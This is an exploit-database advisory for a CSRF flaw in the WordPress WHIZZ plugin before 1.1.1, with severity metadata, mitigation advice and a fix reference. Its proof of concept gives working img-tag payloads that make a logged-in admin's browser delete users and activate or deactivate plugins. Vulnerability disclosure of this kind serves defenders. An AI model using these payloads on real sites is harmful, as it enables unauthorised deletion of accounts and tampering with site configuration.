header-logo
Suggest Exploit
vendor:
WordPress WHIZZ
by:
N/A
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: WordPress WHIZZ
Affected Version From: <1.1.1
Affected Version To: <1.1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress_whizz
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

WordPress WHIZZ CSRF Vulnerability

A Cross-Site Request Forgery (CSRF) vulnerability in WordPress WHIZZ allows attackers to delete any WordPress users and change plugins status. An attacker can include malicious code in a page, which when visited by an authenticated user, can delete users and change plugins status.

Mitigation:

Disable the plugin until a new version is released that fixes this bug.
Source

Exploit-DB raw data:

======
Software: WordPress WHIZZ
Version: <1.1.1
Homepage: https://wordpress.org/plugins/whizz/
=======

Description
================
Get type CSRF in WordPress WHIZZ allows attackers to delete any wordpress users and change plugins status

POC:
========
include in the page ,then attack will occur:

delete user:

<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=users-list&uid=4&view=list_view&deletec=yes&list_of=all_users">


active or disactive plugins:

<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=activatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">

<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=deactivatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">


Mitigations
================
Disable the plugin until a new version is released that fixes this bug.


FIX:
==========
https://wordpress.org/plugins/whizz/ 1.1.1 changelog->Specifically